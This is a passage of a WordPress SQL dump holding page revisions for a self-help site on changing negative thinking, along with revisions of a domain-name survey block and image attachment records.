src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>When describing negative thinking, I will use certain examples to make things clear. However, to keep this website readable, I have often made these examples somewhat simplistic and they may not always exactly match your circumstances, so please add some imagination to make my examples more relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental methods that you can use to deal with negative thinking. It would make more sense to learn about them after you understand the various types of negative thinking, as then you will be able to better appreciate how to use the methods. So as you read about the types of negative thinking, please do not think that I have forgotten to tell you about the various methods! I promise I will share them with you later.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of negative thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1885,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/toofast_170623.jpg" alt="" class="wp-image-1885"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let''s move on to understand common types of negative thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-07-03 05:44:18', '2023-07-03 05:44:18', '', 1034, 'https://www.happythinking.com/?p=2012', 0, 'revision', '', 0),
(2009, 1, '2023-07-02 20:47:36', '2023-07-02 20:47:36', '<!-- wp:paragraph -->\n<p>First of all, welcome to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me a happier person and I am very pleased to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the world we live in is full of stress and problems, which at times can make it challenging to find happiness. Luckily, while we may not be able to always control the things happening around us, one thing we can control is how our minds â€œthinkâ€. Happiness is created by thoughts, so thinking in positive and useful ways can promote happiness in us.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, thinking in negative and useless ways can push us into unhappiness. The â€œway we thinkâ€ is an immensely powerful determinant of our happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>â€œHappy Thinkingâ€ is about changing oneâ€™s negative thinking so that one can, despite the challenges around oneself, be in a state of happiness. To help one to achieve this in a logical manner, I have divided this website about Happy Thinking into two main sections.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>In the first section, I will describe, in an easy-to-understand way, common types of negative thinking that people do. This will help one to recognise such thinking when it happens in oneâ€™s mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second section, I will describe various mental methods that oneâ€™s mind can use to change negative thinking. I like to think of such methods as â€œtoolsâ€, and just like a repairman will use various tools to repair something, one will be able to use these methods to change oneâ€™s negative thinking. These â€œmethodsâ€ are very practical so that one will be able to use them in oneâ€™s daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving methods to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make one into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1868,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron170623.jpg" alt="" class="wp-image-1868"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (first section of this website), I will explain to you in an easy-to-understand way, common types of negative thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you learn about the common types of negative thinking, see which ones are applicable to you. It is very important to keep an open mind when learning about the various types of negative thinking. Think twice before assuming that you do not think in negative ways as your mind may try and convince itself (i.e. you) that it is a perfect thinker!&nbsp; You may also recognise such thinking in your friends and family. If you do, please tell them about this website!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>When describing negative thinking, I will use certain examples to make things clear. However, to keep this website readable, I have often made these examples somewhat simplistic and they may not always exactly match your circumstances, so please add some imagination to make my examples more relevant to you.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental methods that you can use to deal with negative thinking. It would make more sense to learn about them after you understand the various types of negative thinking, as then you will be able to better appreciate how to use the methods. So as you read about the types of negative thinking, please do not think that I have forgotten to tell you about the various methods! I promise I will share them with you later.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of negative thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1885,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/toofast_170623.jpg" alt="" class="wp-image-1885"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let''s move on to understand common types of negative thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-07-02 20:47:36', '2023-07-02 20:47:36', '', 1034, 'https://www.happythinking.com/?p=2009', 0, 'revision', '', 0),
(2010, 1, '2023-07-03 05:42:30', '2023-07-03 05:42:30', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Hello! I am the author of this website. Before you proceed with this free website on happy thinking, I will be grateful for a small favour (not money!) that will take you only a few seconds. Apart from this website, I also want to make a website which will have a story in which a wise monk guides a person towards happiness. I need to choose a nice name for the website that will have this story. I have managed to purchase the website names shown below, but am not sure which one is best. I will be grateful if you will help me to decide which name to use by selecting the name below that you think is better and clicking the submit button. Your choice will really help me to decide. Thank you!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-07-03 05:42:30', '2023-07-03 05:42:30', '', 1910, 'https://www.happythinking.com/?p=2010', 0, 'revision', '', 0),
(2003, 1, '2023-07-02 12:05:38', '2023-07-02 12:05:38', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>To access this website for free, please answer this simple one question survey:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We are making a website about a wise monk giving advice to a person on how to be happy. For such a website, which name below do you think is better? Select the name below that you think is best, and continue. I promise there will be no more surveys or advertising!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-07-02 12:05:38', '2023-07-02 12:05:38', '', 1910, 'https://www.happythinking.com/?p=2003', 0, 'revision', '', 0),
(2004, 1, '2023-07-02 15:38:15', '2023-07-02 15:38:15', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>To access this website for free, please answer this simple one question survey:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We are planning to make a website in which a wise monk gives advice to a person on how to be happy. For such a website, which name below do you think is better? Please click on the name below that you think is best and then click the submit button. Your choice will help us decide which name to use.Thank you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-07-02 15:38:15', '2023-07-02 15:38:15', '', 1910, 'https://www.happythinking.com/?p=2004', 0, 'revision', '', 0),
(2005, 1, '2023-07-02 15:39:41', '2023-07-02 15:39:41', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>To access this website for free, please answer this simple one question survey:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We are planning to make a website in which a wise monk gives advice to a person on how to be happy. For such a website, which name in the list below do you think is better? Please click on the name below that you think is best and then click the submit button. Your choice will help us decide which name to use.Thank you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-07-02 15:39:41', '2023-07-02 15:39:41', '', 1910, 'https://www.happythinking.com/?p=2005', 0, 'revision', '', 0),
(2039, 1, '2023-07-21 08:37:00', '2023-07-21 08:37:00', '', 'two_unhappy_faces_21_7_2023', '', 'inherit', '', 'closed', '', 'two_unhappy_faces_21_7_2023', '', '', '2023-07-21 08:37:00', '2023-07-21 08:37:00', '', 1034, 'https://www.happythinking.com/wp-content/uploads/two_unhappy_faces_21_7_2023.jpg', 0, 'attachment', 'image/jpeg', 0),
(2040, 1, '2023-07-21 08:37:47', '2023-07-21 08:37:47', '', 'one_unhappy_faces_21_7_2023', '', 'inherit', '', 'closed', '', 'one_unhappy_faces_21_7_2023', '', '', '2023-07-21 08:37:47', '2023-07-21 08:37:47', '', 1034, 'https://www.happythinking.com/wp-content/uploads/one_unhappy_faces_21_7_2023.jpg', 0, 'attachment', 'image/jpeg', 0),
(2041, 1, '2023-07-21 08:54:35', '2023-07-21 08:54:35', '', 'shape_bounce_21_7_23', '', 'inherit', '', 'closed', '', 'shape_bounce_21_7_23', '', '', '2023-07-21 08:54:35', '2023-07-21 08:54:35', '', 1034, 'https://www.happythinking.com/wp-content/uploads/shape_bounce_21_7_23.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wpou_posts` VALUES
(1921, 1, '2023-06-21 09:59:01', '2023-06-21 09:59:01', '<!-- wp:image {"align":"center","id":1764,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking-070623.jpg" alt="" class="wp-image-1764"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind.&nbsp; While recognising negative thinking is important, you also need ways of dealing with such thinking. For this, I will share with you various mental techniques (â€œmental toolsâ€) that will help you to change negative thinking into more positive ways of thinking. These mental tools will be very practical so that you can use them in your day to day life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-21 09:59:01', '2023-06-21 09:59:01', '', 88, 'https://www.happythinking.com/?p=1921', 0, 'revision', '', 0),
(1909, 1, '2023-06-21 09:35:33', '2023-06-21 09:35:33', '<!-- wp:image {"align":"center","id":1764,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking-070623.jpg" alt="" class="wp-image-1764"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind.&nbsp; While recognising negative thinking is important, you also need ways of dealing with such thinking. For this, I will share with you various mental techniques (â€œmental toolsâ€) that will help you to change negative thinking into more positive ways of thinking. These mental tools will be very practical so that you can use them in your day to day life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-21 09:35:33', '2023-06-21 09:35:33', '', 88, 'https://www.happythinking.com/?p=1909', 0, 'revision', '', 0),
(1910, 1, '2023-06-21 09:39:58', '2023-06-21 09:39:58', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Hello! I am the author of this website. I will be grateful for a small favour (not money!) that will take you only a few seconds. Apart from this website, I also want to make a website which will have a story in which a wise monk advises a person on how to be happy. I need to choose a nice name for the website that will have this story. I have managed to purchase the website names shown below, but am not sure which one is best. I will be grateful if you will help me to decide which name to use by selecting the name below that you think is better and clicking the submit button. Your choice will be anonymously recorded and will really help me to decide. Thank you!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'publish', 'closed', 'closed', '', 'survey', '', '', '2023-07-03 10:13:20', '2023-07-03 10:13:20', '', 0, 'https://www.happythinking.com/?p=1910', 0, 'wp_block', '', 0),
(1911, 1, '2023-06-21 09:39:58', '2023-06-21 09:39:58', '', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-21 09:39:58', '2023-06-21 09:39:58', '', 1910, 'https://www.happythinking.com/?p=1911', 0, 'revision', '', 0),
(1914, 1, '2023-06-21 09:42:24', '2023-06-21 09:42:24', '<!-- wp:paragraph -->\n<p>Hello friends. This website is new and I am trying to choose a website name for it. Currently, it is called happythinking.com, but I have the option to change it to changenegativethinking.com. will be a better name? I am not sure which name is better so I would be grateful if you will help me choose by clicking on which name below that you think is better. Thank you!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-21 09:42:24', '2023-06-21 09:42:24', '', 1910, 'https://www.happythinking.com/?p=1914', 0, 'revision', '', 0),
(1913, 1, '2023-06-21 09:41:24', '2023-06-21 09:41:24', '<!-- wp:paragraph -->\n<p>Hello friends. This website is new and I am trying to choose a website name for it. Currently, it is called happythinking.com, but I have the option to change it to changenegativethinking.com. will be a better name? I am not sure which name is better so I would be grateful if you will help me choose by clicking on which name below that you think is better. Thank you!</p>\n<!-- /wp:paragraph -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-21 09:41:24', '2023-06-21 09:41:24', '', 1910, 'https://www.happythinking.com/?p=1913', 0, 'revision', '', 0),
(1915, 1, '2023-06-21 09:43:43', '2023-06-21 09:43:43', '<!-- wp:image {"align":"center","id":1764,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking-070623.jpg" alt="" class="wp-image-1764"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind.&nbsp; While recognising negative thinking is important, you also need ways of dealing with such thinking. For this, I will share with you various mental techniques (â€œmental toolsâ€) that will help you to change negative thinking into more positive ways of thinking. These mental tools will be very practical so that you can use them in your day to day life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-21 09:43:43', '2023-06-21 09:43:43', '', 88, 'https://www.happythinking.com/?p=1915', 0, 'revision', '', 0),
(1928, 1, '2023-06-21 13:06:28', '2023-06-21 13:06:28', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>This website about how to be happy is completely free. However, grateful before you proceed, if you can help us choose between the two names below, the name that you think is nicest for this website. Currently, it is called "happythinking.com", but would "changenegativethinking.com" be a better name to use? Please choose below. It will help us to decide.Thank you!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-21 13:06:28', '2023-06-21 13:06:28', '', 1910, 'https://www.happythinking.com/?p=1928', 0, 'revision', '', 0),
(1918, 1, '2023-06-21 09:48:31', '2023-06-21 09:48:31', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Before you proceed, here is a small message from the author of this website: This website is new and I am trying to choose a website name for it. Currently, it is called happythinking.com, but I have the option to change it to changenegativethinking.com.I am not sure which name is better so I would be grateful if you will help me choose by clicking on which name below that you think is better. Thank you!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-21 09:48:31', '2023-06-21 09:48:31', '', 1910, 'https://www.happythinking.com/?p=1918', 0, 'revision', '', 0),
